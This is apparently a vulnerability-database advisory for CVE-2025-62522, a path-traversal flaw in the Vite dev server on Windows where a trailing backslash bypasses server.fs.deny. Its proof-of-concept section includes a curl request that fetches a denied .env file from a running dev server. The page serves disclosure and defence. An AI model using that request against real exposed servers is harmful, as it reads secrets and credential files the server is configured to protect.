🛡️ CVE-2025-62522 — vite

⚪ Unknown ✅ No Known Exploit CWE-22 NVD
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

vite allows server.fs.deny bypass via backslash on Windows

Summary

Files denied by [server.fs.deny](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with \ when the dev server is running on Windows.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))
  • running the dev server on Windows

Details

server.fs.deny can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass by using a back slash(\). The root cause is that fs.readFile('/foo.png/') loads /foo.png.

PoC

```shell

npm create vite@latest

cd vite-project/

cat "secret" > .env

npm install

npm run dev

curl --request-target /.env\ http://localhost:5173

```

<img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" />

Weakness class

CVE-2025-62522 is classified as CWE-22: Path Traversal. A file path built from user input is not confined to the intended directory, letting an attacker reach files elsewhere on the filesystem.

Affected software

CVE-2025-62522 is recorded against 2 packages.

  • unknown
  • vite

Timeline and source

Published on 20 October 2025 and last revised on 17 June 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com
github.com

Details

Severity Unknown
CVSS Score N/A
CVSS Vector N/A
CWE CWE-22
Public Exploit ✅ No
Source NVD
Published 2025-10-20
Updated 2026-08-12
Modified 2026-06-17
Fix URL N/A

Affected Packages

Software From version Fixed in
unknown
vite

Similar Threats

Free Vulnerability Check

Is your site affected by CVE-2025-62522?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against CVE-2025-62522 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.